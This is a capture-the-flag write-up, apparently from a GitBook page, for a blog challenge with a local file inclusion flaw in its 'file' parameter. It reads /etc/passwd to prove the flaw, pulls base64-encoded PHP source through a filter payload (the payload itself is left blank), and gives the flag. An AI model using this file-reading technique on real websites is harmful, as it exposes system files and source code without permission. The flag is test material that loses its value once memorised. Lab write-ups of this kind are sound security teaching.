# I made a blog! ![Screenshot of Challenge](https://584771571-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGhn0OSf58IrV71Z387bZ%2Fuploads%2FwuvRz3fA5oMHqJOOcA5q%2Fimage.png?alt=media\&token=057a717b-06d5-4722-9b7c-dbee45dbfd28) Did you check out my blog posts?\ \
### Hint robots will rule the world! ### Writeup Let's Visit the website ![homepage of website](https://584771571-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGhn0OSf58IrV71Z387bZ%2Fuploads%2FZuOzwLAPZufV1ZRQLAkv%2Fimage.png?alt=media\&token=54e72631-50b1-4761-9f87-8409df60d60b) When you visit you will get a hint. \ Here it is: `How do you filter your coffee?` okay, good! we can see that we are on the right path, now, let's see the blog. Click the 'Read More' button on the blog. You will be redirected to \`\` Perfection! you can see there is a `file` parameter. Let's try to do \`/etc/passwd\` on that parameter
![/etc/passwd in file parameter (working!)](https://584771571-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGhn0OSf58IrV71Z387bZ%2Fuploads%2FOUgZ9pe6sRdHmh8Sd0jn%2Fimage.png?alt=media\&token=7127dc93-bf97-4a10-a0af-3e82b3fb5bcc) So, now let's find the flag. I have used `flag`, `/home/flag`, `/root/flag`, but got no luck. Then, I remembered the hint `flag.php` and then find the payload with filter in PHP. Luckily, I got this one, thanks to PayloadAllThings {% embed url="" %} PayloadAllThings {% endembed %} Use this payload and boom, you will get string, \`\` Output String: `PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K` This is a base64 encoded string, decode it with a base64 decoder On decoding string, it will show the flag!!! 🎉 ### Flag: `EZ-CTF{LFI_1S_3Z}`